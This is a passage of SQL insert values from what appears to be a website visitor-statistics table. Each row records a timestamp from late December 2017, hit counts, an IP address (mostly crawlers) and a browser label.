,1,0,0,'54.36.149.96','other'),(192154,1514503035,1,1,0,0,'54.36.149.71','other'),(192155,1514503075,1,1,0,0,'54.36.149.35','other'),(192156,1514503374,1,1,0,0,'141.8.142.74','other'),(192157,1514503508,2,2,0,0,'207.46.13.112','other'),(192158,1514504167,1,1,0,0,'54.36.149.36','other'),(192159,1514504221,1,1,0,0,'54.36.148.38','other'),(192160,1514504288,1,1,0,0,'40.77.167.5','other'),(192161,1514504449,1,1,0,0,'54.36.149.80','other'),(192162,1514504624,1,1,0,0,'54.36.148.88','other'),(192163,1514504663,1,1,0,0,'54.36.148.108','other'),(192164,1514504753,1,1,0,0,'54.36.149.68','other'),(192165,1514504969,1,1,0,0,'8.29.198.26','other'),(192166,1514505173,1,1,0,0,'207.46.13.129','other'),(192167,1514505196,1,1,0,0,'54.36.148.96','other'),(192168,1514505601,1,1,0,0,'54.36.148.199','other'),(192169,1514505776,1,1,0,0,'141.8.132.19','other'),(192170,1514505915,1,1,0,0,'54.36.149.12','other'),(192171,1514506438,1,1,0,0,'54.36.149.58','other'),(192172,1514506478,1,1,0,0,'178.154.171.88','other'),(192173,1514506514,1,1,0,0,'54.36.149.95','other'),(192174,1514506668,1,1,0,0,'141.8.142.74','other'),(192175,1514506844,1,1,0,0,'54.36.148.154','other'),(192176,1514507139,1,1,0,0,'51.255.71.119','other'),(192177,1514507395,1,0,1,0,'66.249.64.30',''),(192178,1514507419,1,1,0,0,'54.36.149.41','other'),(192179,1514507523,1,1,0,0,'54.36.148.84','other'),(192180,1514507570,1,1,0,0,'54.36.148.90','other'),(192181,1514507824,1,1,0,0,'54.36.149.13','other'),(192182,1514507872,1,1,0,0,'54.36.149.87','other'),(192183,1514508109,2,2,0,0,'54.36.148.247','other'),(192184,1514508111,1,1,0,0,'54.36.148.252','other'),(192185,1514508537,1,1,0,0,'54.36.148.183','other'),(192186,1514509007,1,1,0,0,'54.36.148.89','other'),(192187,1514509204,1,1,0,0,'90.188.255.142','chrome'),(192188,1514509291,1,1,0,0,'54.36.148.118','other'),(192189,1514509480,1,1,0,0,'54.36.148.177','other'),(192190,1514509716,1,1,0,0,'51.255.71.118','other'),(192191,1514509758,1,1,0,0,'207.46.13.112','other'),(192192,1514510016,1,1,0,0,'54.36.148.47','other'),(192193,1514510106,1,1,0,0,'87.250.224.46','other'),(192194,1514510123,1,1,0,0,'54.36.148.199','other'),(192195,1514510285,1,1,0,0,'54.36.148.65','other'),(192196,1514510400,1,1,0,0,'54.36.148.196','other'),(192197,1514510441,1,1,0,0,'54.36.148.255','other'),(192198,1514510576,1,1,0,0,'54.36.148.181','other'),(192199,1514510619,1,1,0,0,'54.36.148.22','other'),(192200,1514510637,1,1,0,0,'54.36.149.20','other'),(192201,1514510705,2,2,0,0,'69.30.213.202','other'),(192202,1514510712,1,1,0,0,'40.77.167.5','other'),(192203,1514510814,1,1,0,0,'54.36.148.253','other'),(192204,1514511143,1,1,0,0,'54.36.149.34','other'),(192205,1514512110,1,1,0,0,'54.36.148.84','other'),(192206,1514512140,1,1,0,0,'54.36.148.208','other'),(192207,1514512314,1,1,0,0,'54.36.148.16','other'),(192208,1514512828,1,1,0,0,'54.36.149.58','other'),(192209,1514512838,1,1,0,0,'217.69.133.248','other'),(192210,1514512887,1,1,0,0,'207.46.13.112','other'),(192211,1514512982,2,2,0,0,'198.204.244.90','other'),(192212,1514513034,1,1,0,0,'54.36.148.49','other'),(192213,1514513193,1,1,0,0,'54.36.148.91','other'),(192214,1514513219,1,1,0,0,'54.36.148.237','other'),(192215,1514513274,1,1,0,0,'54.36.149.62','other'),(192216,1514513541,1,1,0,0,'51.255.71.117','other'),(192217,1514513702,1,1,0,0,'54.36.148.207','other'),(192218,1514513788,1,1,0,0,'54.36.148.72','other'),(192219,1514513944,2,2,0,0,'54.36.148.21','other'),(192220,1514514273,1,1,0,0,'217.69.133.228','other'),(192221,1514514323,1,1,0,0,'54.36.149.81','other'),(192222,1514514835,1,1,0,0,'54.36.148.236','other'),(192223,1514515361,1,1,0,0,'37.9.113.182','other'),(192224,1514515671,1,1,0,0,'54.36.149.83','other'),(192225,1514515801,1,1,0,0,'8.29.198.25','other'),(192226,1514515981,1,1,0,0,'54.36.148.53','other'),(192227,1514516696,1,1,0,0,'54.36.149.83','other'),(192228,1514516750,1,1,0,0,'54.36.148.191','other'),(192229,1514516989,1,1,0,0,'54.36.149.20','other'),(192230,1514517369,1,1,0,0,'54.36.148.109','other'),(192231,1514517388,1,1,0,0,'207.46.13.112','other'),(192232,1514517419,1,1,0,0,'141.8.142.74','other'),(192233,1514517726,1,1,0,0,'54.36.149.100','other'),(192234,1514517872,1,1,0,0,'54.36.149.81','other'),(192235,1514517903,1,1,0,0,'54.36.149.57','other'),(192236,1514518198,1,1,0,0,'54.36.148.149','other'),(192237,1514518507,1,1,0,0,'54.36.148.95','other'),(192238,1514518592,1,1,0,0,'54.36.148.141','other'),(192239,1514518978,1,1,0,0,'54.36.148.46','other'),(192240,1514519002,1,1,0,0,'54.36.149.106','other'),(192241,1514519321,1,1,0,0,'54.36.148.40','other'),(192242,1514519346,1,1,0,0,'54.36.149.1','other'),(192243,1514519352,1,1,0,0,'54.36.149.10','other'),(192244,1514519402,1,1,0,0,'54.36.148.125','other'),(192245,1514519427,1,1,0,0,'54.36.148.94','other'),(192246,1514519437,1,1,0,0,'54.36.148.120','other'),(192247,1514519489,1,1,0,0,'54.36.149.72','other'),(192248,1514519598,1,1,0,0,'54.36.148.104','other'),(192249,1514520025,2,2,0,0,'178.154.171.88','other'),(192250,1514520831,1,1,0,0,'54.36.148.128','other'),(192251,1514520989,1,1,0,0,'54.36.149.3','other'),(192252,1514521055,1,1,0,0,'54.36.149.76','other'),(192253,1514521254,1,1,0,0,'66.249.70.25','chrome'),(192254,1514521288,1,1,0,0,'54.36.149.60','other'),(192255,1514521307,1,1,0,0,'54.36.148.104','other'),(192256,1514522343,1,1,0,0,'51.255.71.113','other'),(192257,1514522477,1,1,0,0,'54.36.149.26','other'),(192258,1514522707,1,1,0,0,'54.36.148.231','other'),(192259,1514522783,1,1,0,0,'54.36.149.60','other'),(192260,1514522788,1,1,0,0,'40.77.167.5','other'),(192261,1514522944,1,1,0,0,'54.36.148.186','other'),(192262,1514523110,1,1,0,0,'54.36.148.75','other'),(192263,1514523451,1,1,0,0,'54.36.148.200','other'),(192264,1514523562,1,1,0,0,'54.36.148.202','other'),(192265,1514523825,1,1,0,0,'54.36.148.243','other'),(192266,1514523990,1,1,0,0,'54.36.149.57','other'),(192267,1514524297,1,1,0,0,'54.36.148.94','other'),(192268,1514524998,1,1,0,0,'66.249.64.29','chrome'),(192269,1514525457,1,1,0,0,'54.36.148.147','other'),(192270,1514525497,1,1,0,0,'54.36.148.254','other'),(192271,1514525669,1,1,0,0,'54.36.149.34','other'),(192272,1514526254,1,1,0,0,'54.36.149.10','other'),(192273,1514526276,1,1,0,0,'54.36.148.75','other'),(192274,1514526623,1,1,0,0,'8.29.198.26','other'),(192275,1514526723,1,1,0,0,'54.36.148.50','other'),(192276,1514527067,1,1,0,0,'54.36.148.24','other'),(192277,1514527203,1,1,0,0,'37.9.113.101','other'),(192278,1514527254,1,1,0,0,'54.36.149.20','other'),(192279,1514527390,3,3,0,0,'141.8.142.74','other'),(192280,1514527504,1,1,0,0,'54.36.149.40','other'),(192281,1514527697,1,1,0,0,'54.36.149.54','other'),(192282,1514527749,1,1,0,0,'54.36.149.25','other'),(192283,1514527777,1,1,0,0,'54.36.148.96','other'),(192284,1514527811,1,1,0,0,'54.36.149.0','other'),(192285,1514527963,1,1,0,0,'54.36.149.92','other'),(192286,1514528088,1,0,1,0,'66.249.64.30',''),(192287,1514528094,1,1,0,0,'95.132.5.148','firefox'),(192288,1514528244,1,1,0,0,'91.196.178.69','chrome'),(192289,1514528799,1,1,0,0,'54.36.149.32','other'),(192290,1514529085,1,1,0,0,'54.36.149.47','other'),(192291,1514529185,1,1,0,0,'54.36.149.7','other'),(192292,1514529386,1,1,0,0,'54.36.148.94','other'),(192293,1514529591,4,4,0,0,'141.8.142.74','other'),(192294,1514529595,1,1,0,0,'178.154.171.88','other'),(192295,1514529770,1,1,0,0,'91.196.178.162','chrome'),(192296,1514529819,2,2,0,0,'91.196.178.65','chrome'),(192297,1514529895,1,1,0,0,'91.196.178.167','chrome'),(192298,1514529917,1,1,0,0,'54.36.148.34','other'),(192299,1514529929,2,2,0,0,'54.36.148.102','other'),(192300,1514529930,1,1,0,0,'54.36.148.42','other'),(192301,1514530387,1,1,0,0,'54.36.149.25','other'),(192302,1514530638,1,1,0,0,'54.36.148.183','other'),(192303,1514531152,1,1,0,0,'51.255.71.131','other'),(192304,1514531239,1,1,0,0,'195.230.119.34','chrome'),(192305,1514531304,1,1,0,0,'207.46.13.112','other'),(192306,1514531325,1,1,0,0,'54.36.149.87','other'),(192307,1514531413,1,1,0,0,'54.36.148.247','other'),(192308,1514531509,1,1,0,0,'54.36.149.88','other'),(192309,1514531581,1,1,0,0,'54.36.148.82','other'),(192310,1514532065,1,1,0,0,'54.36.148.61','other'),(192311,1514532251,1,1,0,0,'54.36.148.35','other'),(192312,1514532359,1,1,0,0,'54.36.148.137','other'),(192313,1514532717,1,1,0,0,'54.36.148.195','other'),(192314,1514532879,1,1,0,0,'54.36.148.245','other'),(192315,1514532992,1,1,0,0,'66.249.64.30','chrome'),(192316,1514533087,1,1,0,0,'54.36.149.50','other'),(192317,1514533136,1,1,0,0,'91.196.178.167','chrome'),(192318,1514533354,1,1,0,0,'54.36.148.173','other'),(192319,1514533365,1,1,0,0,'93.170.97.49','firefox'),(192320,1514533449,1,1,0,0,'54.36.148.17','other'),(192321,1514533864,1,1,0,0,'54.36.149.49','other'),(192322,1514534500,1,1,0,0,'54.36.149.2','other'),(192323,1514534714,1,1,0,0,'54.36.148.235','other'),(192324,1514535484,1,1,0,0,'54.36.148.147','other'),(192325,1514535540,1,1,0,0,'91.196.178.162','chrome'),(192326,1514535761,1,1,0,0,'54.36.148.146','other'),(192327,1514535875,1,1,0,0,'54.36.148.245','other'),(192328,1514536251,1,1,0,0,'54.36.148.165','other'),(192329,1514536384,1,1,0,0,'91.196.178.68','chrome'),(192330,1514536566,1,1,0,0,'51.255.71.116','other'),(192331,1514536903,1,1,0,0,'91.196.178.65','chrome'),(192332,1514537256,1,1,0,0,'51.255.71.117','other'),(192333,1514537301,1,1,0,0,'54.36.149.12','other'),(192334,1514537396,2,2,0,0,'141.8.142.74','other'),(192335,1514537456,1,1,0,0,'8.29.198.27','other'),(192336,1514537565,1,1,0,0,'54.36.148.176','other'),(192337,1514537774,1,0,1,0,'66.249.64.29',''),(192338,1514537784,1,1,0,0,'54.36.148.127','other'),(192339,1514537799,1,1,0,0,'54.36.148.75','other'),(192340,1514538293,1,1,0,0,'91.196.179.134','chrome'),(192341,1514538343,1,1,0,0,'54.36.148.121','other'),(192342,1514538466,1,1,0,0,'54.36.149.41','other'),(192343,1514538719,1,1,0,0,'141.8.142.74','other'),(192344,1514538757,1,1,0,0,'54.36.149.0','other'),(192345,1514538962,1,1,0,0,'54.36.148.107','other'),(192346,1514539098,1,1,0,0,'54.36.149.82','other'),(192347,1514539605,1,1,0,0,'54.36.148.40','other'),(192348,1514539657,1,1,0,0,'54.36.149.80','other'),(192349,1514539956,1,1,0,0,'134.249.146.125','chrome'),(192350,1514540092,1,1,0,0,'91.196.178.163','firefox'),(192351,1514540914,3,3,0,0,'37.187.75.71','other'),(192352,1514541036,1,1,0,0,'217.69.133.233','other'),(192353,1514541126,1,0,1,0,'66.249.64.29',''),(192354,1514541144,1,1,0,0,'141.8.142.74','other'),(192355,1514541660,1,1,0,0,'54.36.149.2','other'),(192356,1514541779,1,1,0,0,'54.36.149.10','other'),(192357,1514541925,1,1,0,0,'51.255.71.118','other'),(192358,1514541944,1,1,0,0,'91.196.179.134','chrome'),(192359,1514542089,1,1,0,0,'91.196.178.130','chrome'),(192360,1514542204,1,1,0,0,'54.36.148.32','other'),(192361,1514542414,1,0,1,0,'66.249.64.28',''),(192362,1514542930,1,1,0,0,'54.36.148.21','other'),(192363,1514542956,1,1,0,0,'54.36.149.55','other'),(192364,1514543170,1,1,0,0,'54.36.148.58','other'),(192365,1514543220,1,1,0,0,'54.36.149.41','other'),(192366,1514543223,1,1,0,0,'54.36.149.1','other'),(192367,1514543245,1,1,0,0,'54.36.149.104','other'),(192368,1514543257,1,1,0,0,'77.111.244.26','chrome'),(192369,1514543296,1,1,0,0,'54.36.149.37','other'),(192370,1514543453,1,1,0,0,'54.36.148.52','other'),(192371,1514543862,1,1,0,0,'54.36.148.177','other'),(192372,1514543998,1,1,0,0,'54.36.149.71','other'),(192373,1514544239,1,1,0,0,'91.196.178.65','chrome'),(192374,1514544367,1,1,0,0,'54.36.148.86','other'),(192375,1514544878,1,1,0,0,'54.36.148.189','other'),(192376,1514544990,1,1,0,0,'54.36.148.161','other'),(192377,1514545518,1,1,0,0,'54.36.149.84','other'),(192378,1514545724,1,1,0,0,'54.36.149.83','other'),(192379,1514545845,1,1,0,0,'54.36.148.72','other'),(192380,1514546008,1,1,0,0,'54.36.148.166','other'),(192381,1514546364,1,1,0,0,'54.36.149.0','other'),(192382,1514546535,1,1,0,0,'141.8.142.74','other'),(192383,1514546784,1,1,0,0,'54.36.148.118','other'),(192384,1514546867,1,1,0,0,'54.36.148.145','other'),(192385,1514546910,1,1,0,0,'54.36.148.84','other'),(192386,1514547096,1,1,0,0,'54.36.148.252','other'),(192387,1514547320,1,1,0,0,'51.255.71.128','other'),(192388,1514547505,1,1,0,0,'54.36.148.74','other'),(192389,1514547521,1,1,0,0,'54.36.148.13','other'),(192390,1514547601,1,1,0,0,'141.8.142.74','other'),(192391,1514547761,1,1,0,0,'54.36.148.108','other'),(192392,1514547922,1,1,0,0,'54.36.148.176','other'),(192393,1514548220,1,1,0,0,'51.255.71.117','other'),(192394,1514548295,1,1,0,0,'8.29.198.27','other'),(192395,1514548722,1,1,0,0,'54.36.148.158','other'),(192396,1514548931,1,1,0,0,'54.36.148.153','other'),(192397,1514549238,1,1,0,0,'54.36.148.75','other'),(192398,1514549701,1,1,0,0,'54.36.148.83','other'),(192399,1514550022,1,1,0,0,'54.36.149.48','other'),(192400,1514550103,1,1,0,0,'217.69.133.15','other'),(192401,1514550106,1,1,0,0,'51.255.71.129','other'),(192402,1514550111,1,1,0,0,'54.36.148.80','other'),(192403,1514550116,1,1,0,0,'93.78.212.214','firefox'),(192404,1514550153,1,1,0,0,'54.36.148.107','other'),(192405,1514550234,1,1,0,0,'207.46.13.112','other'),(192406,1514550326,1,1,0,0,'178.154.171.88','other'),(192407,1514550346,1,1,0,0,'54.36.148.136','other'),(192408,1514550615,1,1,0,0,'54.36.149.107','other'),(192409,1514550798,1,1,0,0,'54.36.148.126','other'),(192410,1514550963,1,1,0,0,'51.255.71.121','other'),(192411,1514550977,1,1,0,0,'54.36.148.118','other'),(192412,1514551226,1,1,0,0,'54.36.148.21','other'),(192413,1514551519,1,1,0,0,'54.36.148.187','other'),(192414,1514551521,1,1,0,0,'54.36.148.59','other'),(192415,1514551627,1,1,0,0,'54.36.149.47','other'),(192416,1514552470,1,1,0,0,'141.8.142.74','other'),(192417,1514552527,1,1,0,0,'54.36.149.52','other'),(192418,1514552569,1,1,0,0,'91.196.178.168','chrome'),(192419,1514552887,1,1,0,0,'51.255.71.129','other'),(192420,1514553049,1,1,0,0,'54.36.148.247','other'),(192421,1514553091,1,1,0,0,'54.36.149.100','other'),(192422,1514553142,1,1,0,0,'54.36.148.90','other'),(192423,1514553232,1,1,0,0,'54.36.148.80','other'),(192424,1514553241,1,1,0,0,'54.36.148.127','other'),(192425,1514553423,1,1,0,0,'54.36.148.238','other'),(192426,1514553564,1,1,0,0,'91.196.178.167','chrome'),(192427,1514553600,1,1,0,0,'54.36.148.184','other'),(192428,1514553769,2,0,2,0,'66.249.64.29',''),(192429,1514553915,1,1,0,0,'54.36.148.244','other'),(192430,1514554153,1,1,0,0,'54.36.148.247','other'),(192431,1514554198,1,1,0,0,'54.36.149.44','other'),(192432,1514554430,1,1,0,0,'54.36.148.103','other'),(192433,1514554580,1,1,0,0,'54.36.148.150','other'),(192434,1514554603,1,1,0,0,'54.36.148.202','other'),(192435,1514554672,1,1,0,0,'54.36.148.55','other'),(192436,1514554720,1,1,0,0,'54.36.149.43','other'),(192437,1514554760,1,1,0,0,'54.36.149.88','other'),(192438,1514554837,1,1,0,0,'91.209.11.236','other'),(192439,1514555048,1,1,0,0,'54.36.149.62','other'),(192440,1514555603,1,1,0,0,'54.36.148.105','other'),(192441,1514555729,1,1,0,0,'207.46.13.129','other'),(192442,1514555786,1,1,0,0,'54.36.148.24','other'),(192443,1514556089,1,1,0,0,'54.36.148.141','other'),(192444,1514556100,1,1,0,0,'92.113.157.221','chrome'),(192445,1514556101,1,1,0,0,'54.36.148.106','other'),(192446,1514556537,1,1,0,0,'54.36.148.37','other'),(192447,1514556832,1,1,0,0,'54.36.149.23','other'),(192448,1514557254,1,1,0,0,'54.36.148.186','other'),(192449,1514557352,1,1,0,0,'207.46.13.112','other'),(192450,1514557377,1,1,0,0,'54.36.148.163','other'),(192451,1514557408,1,1,0,0,'89.178.232.71','msie'),(192452,1514557434,1,1,0,0,'54.36.148.154','other'),(192453,1514557441,1,1,0,0,'54.36.149.48','other'),(192454,1514557723,1,1,0,0,'54.36.149.21','other'),(192455,1514557838,1,0,1,0,'66.249.64.29',''),(192456,1514557860,1,1,0,0,'54.36.148.63','other'),(192457,1514558153,1,1,0,0,'54.36.149.79','other'),(192458,1514558187,1,0,1,0,'66.249.64.28',''),(192459,1514558232,1,1,0,0,'54.36.149.54','other'),(192460,1514558862,1,1,0,0,'54.36.148.165','other'),(192461,1514559035,1,1,0,0,'54.36.148.10','other'),(192462,1514559139,1,1,0,0,'8.29.198.25','other'),(192463,1514559223,1,1,0,0,'54.36.148.97','other'),(192464,1514559456,1,1,0,0,'54.36.149.64','other'),(192465,1514559665,1,1,0,0,'54.36.148.72','other'),(192466,1514559828,1,1,0,0,'87.76.237.131','chrome'),(192467,1514560024,1,1,0,0,'54.36.148.170','other'),(192468,1514560181,1,1,0,0,'54.36.148.130','other'),(192469,1514560479,1,1,0,0,'54.36.148.42','other'),(192470,1514560982,1,1,0,0,'54.36.149.25','other'),(192471,1514561207,1,1,0,0,'54.36.148.191','other'),(192472,1514561443,1,1,0,0,'54.36.149.22','other'),(192473,1514562039,1,1,0,0,'91.209.11.236','other'),(192474,1514562287,1,1,0,0,'180.76.15.8','other'),(192475,1514562588,1,1,0,0,'54.36.148.71','other'),(192476,1514562758,1,1,0,0,'107.170.145.187','chrome'),(192477,1514562866,1,1,0,0,'54.36.149.32','other'),(192478,1514562868,1,1,0,0,'51.255.71.129','other'),(192479,1514563164,1,1,0,0,'207.46.13.169','other'),(192480,1514563448,1,1,0,0,'54.36.148.167','other'),(192481,1514563634,1,1,0,0,'54.36.148.202','other'),(192482,1514563652,1,1,0,0,'54.36.148.66','other'),(192483,1514563841,1,1,0,0,'92.113.157.221','chrome'),(192484,1514563909,1,1,0,0,'54.36.149.88','other'),(192485,1514564044,1,1,0,0,'54.36.149.91','other'),(192486,1514564235,1,1,0,0,'91.196.178.131','firefox'),(192487,1514564315,1,1,0,0,'54.36.148.172','other'),(192488,1514564879,1,1,0,0,'54.36.148.255','other'),(192489,1514565140,1,1,0,0,'54.36.148.171','other'),(192490,1514565614,1,0,1,0,'66.249.70.27',''),(192491,1514565667,1,1,0,0,'54.36.148.104','other'),(192492,1514565676,1,1,0,0,'54.36.149.63','other'),(192493,1514565938,1,1,0,0,'54.36.148.150','other'),(192494,1514566072,1,1,0,0,'54.36.149.47','other'),(192495,1514566082,1,1,0,0,'54.36.148.185','other'),(192496,1514566244,1,1,0,0,'54.36.149.27','other'),(192497,1514566288,1,1,0,0,'54.36.149.46','other'),(192498,1514566402,1,1,0,0,'54.36.148.247','other'),(192499,1514566497,1,1,0,0,'51.255.71.132','other'),(192500,1514566562,1,1,0,0,'54.36.149.32','other'),(192501,1514566612,1,1,0,0,'54.36.148.161','other'),(192502,1514566796,1,1,0,0,'217.69.136.208','other'),(192503,1514567010,1,1,0,0,'54.36.148.40','other'),(192504,1514567189,1,1,0,0,'54.36.148.131','other'),(192505,1514567319,1,1,0,0,'54.36.148.121','other'),(192506,1514567795,1,1,0,0,'54.36.148.30','other'),(192507,1514568133,1,1,0,0,'54.36.148.127','other'),(192508,1514568409,1,1,0,0,'54.36.149.93','other'),(192509,1514568570,1,1,0,0,'54.36.148.139','other'),(192510,1514568803,1,1,0,0,'54.36.148.176','other'),(192511,1514568841,1,1,0,0,'54.36.148.60','other'),(192512,1514568887,1,1,0,0,'54.36.148.141','other'),(192513,1514568922,1,1,0,0,'51.255.71.114','other'),(192514,1514568995,1,1,0,0,'54.36.149.38','other'),(192515,1514569029,1,1,0,0,'54.36.148.134','other'),(192516,1514569053,1,0,1,0,'66.249.64.29',''),(192517,1514569159,2,2,0,0,'54.36.149.98','other'),(192518,1514569190,1,1,0,0,'54.36.149.59','other'),(192519,1514569219,1,1,0,0,'54.36.148.199','other'),(192520,1514569372,1,1,0,0,'54.36.148.185','other'),(192521,1514569657,1,1,0,0,'54.36.149.73','other'),(192522,1514569683,1,1,0,0,'54.36.148.77','other'),(192523,1514569688,1,1,0,0,'207.46.13.169','other'),(192524,1514569799,1,1,0,0,'54.36.149.34','other'),(192525,1514569964,1,1,0,0,'8.29.198.26','other'),(192526,1514569978,1,1,0,0,'54.36.148.234','other'),(192527,1514570020,1,1,0,0,'54.36.148.63','other'),(192528,1514570169,1,1,0,0,'54.36.149.61','other'),(192529,1514570358,1,1,0,0,'54.36.149.26','other'),(192530,1514570638,1,1,0,0,'54.36.149.64','other'),(192531,1514570698,1,1,0,0,'54.36.148.110','other'),(192532,1514570997,1,1,0,0,'54.36.148.117','other'),(192533,1514571027,1,1,0,0,'207.46.13.69','other'),(192534,1514571237,1,1,0,0,'94.179.147.128','other'),(192535,1514571585,1,1,0,0,'54.36.148.63','other'),(192536,1514571792,1,1,0,0,'54.36.149.39','other'),(192537,1514572126,1,1,0,0,'54.36.149.48','other'),(192538,1514572155,1,1,0,0,'54.36.149.15','other'),(192539,1514572212,1,1,0,0,'91.196.178.52','chrome'),(192540,1514572383,1,1,0,0,'51.255.71.129','other'),(192541,1514572572,1,1,0,0,'54.36.149.8','other'),(192542,1514572942,1,1,0,0,'157.55.39.56','other'),(192543,1514573087,1,1,0,0,'54.36.149.33','other'),(192544,1514573163,1,1,0,0,'54.36.148.245','other'),(192545,1514573881,1,1,0,0,'54.36.148.84','other'),(192546,1514573892,1,1,0,0,'54.36.149.44','other'),(192547,1514574026,1,1,0,0,'54.36.149.6','other'),(192548,1514574066,2,2,0,0,'199.58.86.209','other'),(192549,1514574274,1,1,0,0,'207.46.13.112','other'),(192550,1514574344,1,1,0,0,'54.36.148.229','other'),(192551,1514574450,1,1,0,0,'54.36.149.75','other'),(192552,1514574584,1,1,0,0,'54.36.149.1','other'),(192553,1514574827,1,1,0,0,'54.36.149.86','other'),(192554,1514575204,1,1,0,0,'54.36.149.68','other'),(192555,1514575551,1,0,1,0,'66.249.64.29',''),(192556,1514575915,1,1,0,0,'54.36.148.71','other'),(192557,1514576006,1,1,0,0,'217.69.133.239','other'),(192558,1514576216,1,1,0,0,'54.36.148.53','other'),(192559,1514576622,1,0,1,0,'66.249.70.25',''),(192560,1514577186,1,1,0,0,'54.36.148.202','other'),(192561,1514577845,1,1,0,0,'54.36.149.57','other'),(192562,1514577886,1,1,0,0,'207.46.13.69','other'),(192563,1514578509,1,1,0,0,'54.36.148.154','other'),(192564,1514578547,1,1,0,0,'82.145.221.127','chrome'),(192565,1514578657,1,1,0,0,'172.241.151.28','other'),(192566,1514578739,1,1,0,0,'54.36.148.27','other'),(192567,1514579147,1,1,0,0,'54.36.148.37','other'),(192568,1514579549,1,1,0,0,'54.36.148.189','other'),(192569,1514580630,1,1,0,0,'207.46.13.112','other'),(192570,1514580688,1,1,0,0,'54.36.148.208','other'),(192571,1514580775,1,1,0,0,'54.36.148.233','other'),(192572,1514580798,1,1,0,0,'8.29.198.25','other'),(192573,1514581284,1,1,0,0,'54.36.149.6','other'),(192574,1514581736,1,1,0,0,'54.36.148.180','other'),(192575,1514581969,1,1,0,0,'54.36.148.31','other'),(192576,1514582295,1,1,0,0,'54.36.149.75','other'),(192577,1514582751,1,1,0,0,'51.255.71.131','other'),(192578,1514583009,1,1,0,0,'54.36.148.241','other'),(192579,1514583056,1,1,0,0,'54.36.149.103','other'),(192580,1514583234,1,1,0,0,'54.36.148.70','other'),(192581,1514583787,1,1,0,0,'54.36.149.36','other'),(192582,1514584385,1,1,0,0,'207.46.13.112','other'),(192583,1514584459,1,1,0,0,'54.36.148.194','other'),(192584,1514585193,2,0,2,0,'66.249.64.30',''),(192585,1514585784,1,1,0,0,'66.249.70.29','chrome'),(192586,1514586505,1,1,0,0,'54.36.148.82','other'),(192587,1514586739,1,0,1,0,'66.249.64.28',''),(192588,1514586846,1,1,0,0,'54.36.149.14','other'),(192589,1514586883,1,1,0,0,'51.255.71.117','other'),(192590,1514587379,1,1,0,0,'54.36.148.164','other'),(192591,1514587755,1,1,0,0,'54.36.149.57','other'),(192592,1514587763,1,1,0,0,'54.36.148.54','other'),(192593,1514587866,1,1,0,0,'54.36.148.95','other'),(192594,1514588024,1,1,0,0,'178.140.15.136','msie'),(192595,1514588090,1,1,0,0,'66.249.64.29','chrome'),(192596,1514588515,1,1,0,0,'54.36.148.72','other'),(192597,1514588815,1,0,1,0,'66.249.70.27',''),(192598,1514588872,1,1,0,0,'54.36.148.37','other'),(192599,1514588890,1,1,0,0,'51.255.71.130','other'),(192600,1514588966,1,0,1,0,'66.249.70.29',''),(192601,1514589011,1,1,0,0,'54.36.148.149','other'),(192602,1514589222,1,1,0,0,'54.36.149.68','other'),(192603,1514589341,1,1,0,0,'54.36.148.157','other'),(192604,1514589690,1,1,0,0,'54.36.148.239','other'),(192605,1514589885,1,1,0,0,'54.36.148.19','other'),(192606,1514590833,1,1,0,0,'54.36.149.68','other'),(192607,1514590840,1,1,0,0,'54.36.148.84','other'),(192608,1514590891,1,1,0,0,'54.36.149.43','other'),(192609,1514591638,1,1,0,0,'8.29.198.25','other'),(192610,1514591933,1,0,1,0,'66.249.64.28',''),(192611,1514591987,1,1,0,0,'95.221.59.143','msie'),(192612,1514592461,1,1,0,0,'54.36.149.34','other'),(192613,1514592534,1,1,0,0,'54.36.148.53','other'),(192614,1514592709,1,1,0,0,'51.255.71.122','other'),(192615,1514592734,1,1,0,0,'54.36.148.26','other'),(192616,1514592798,1,1,0,0,'54.36.148.255','other'),(192617,1514593183,1,1,0,0,'54.36.148.155','other'),(192618,1514593423,1,1,0,0,'54.36.148.133','other'),(192619,1514593656,1,1,0,0,'54.36.148.237','other'),(192620,1514593835,1,1,0,0,'54.36.148.250','other'),(192621,1514594260,1,0,1,0,'66.249.70.27',''),(192622,1514594781,1,1,0,0,'54.36.148.26','other'),(192623,1514594911,1,1,0,0,'54.36.148.237','other'),(192624,1514595572,1,1,0,0,'54.36.148.150','other'),(192625,1514595704,1,1,0,0,'54.36.149.8','other'),(192626,1514595894,1,1,0,0,'54.36.148.12','other'),(192627,1514596029,1,1,0,0,'207.46.13.129','other'),(192628,1514596303,1,1,0,0,'54.36.149.61','other'),(192629,1514597061,1,1,0,0,'51.255.71.115','other'),(192630,1514597203,1,1,0,0,'54.36.149.27','other'),(192631,1514597464,1,1,0,0,'54.36.149.35','other'),(192632,1514597784,1,0,1,0,'66.249.70.25',''),(192633,1514598349,1,1,0,0,'54.36.148.121','other'),(192634,1514598459,1,1,0,0,'54.36.149.3','other'),(192635,1514598593,1,1,0,0,'54.36.148.163','other'),(192636,1514598822,1,1,0,0,'54.36.148.185','other'),(192637,1514599414,1,1,0,0,'172.241.151.29','other'),(192638,1514599792,1,0,1,0,'66.249.64.30',''),(192639,1514600125,1,0,1,0,'66.249.64.28',''),(192640,1514600258,1,1,0,0,'54.36.149.30','other'),(192641,1514600296,1,0,1,0,'66.249.66.155',''),(192642,1514601123,1,1,0,0,'54.36.148.249','other'),(192643,1514601266,1,1,0,0,'54.36.148.59','other'),(192644,1514601757,1,1,0,0,'54.36.148.69','other'),(192645,1514601787,1,0,1,0,'66.249.64.30',''),(192646,1514602134,1,1,0,0,'54.36.148.252','other'),(192647,1514602295,1,1,0,0,'5.228.106.138','msie'),(192648,1514602470,1,1,0,0,'8.29.198.25','other'),(192649,1514602688,1,1,0,0,'54.36.148.159','other'),(192650,1514602764,1,1,0,0,'54.36.148.207','other'),(192651,1514602803,1,1,0,0,'54.36.149.98','other'),(192652,1514603058,1,1,0,0,'54.36.148.55','other'),(192653,1514603226,1,1,0,0,'54.36.149.94','other'),(192654,1514603294,1,1,0,0,'54.36.148.123','other'),(192655,1514603551,1,1,0,0,'54.36.148.140','other'),(192656,1514603597,1,1,0,0,'51.255.71.130','other'),(192657,1514603688,1,1,0,0,'54.36.148.31','other'),(192658,1514603848,1,1,0,0,'54.36.148.204','other'),(192659,1514604086,1,1,0,0,'54.36.148.146','other'),(192660,1514604106,1,1,0,0,'54.36.148.152','other'),(192661,1514604222,1,1,0,0,'54.36.149.45','other'),(192662,1514605122,1,0,1,0,'66.249.64.29',''),(192663,1514605568,1,1,0,0,'54.36.148.81','other'),(192664,1514605722,1,1,0,0,'54.36.149.36','other'),(192665,1514606164,1,1,0,0,'54.36.148.194','other'),(192666,1514606194,2,2,0,0,'54.165.59.7','other'),(192667,1514606867,1,0,1,0,'66.249.70.29',''),(192668,1514607510,1,1,0,0,'54.165.59.7','other')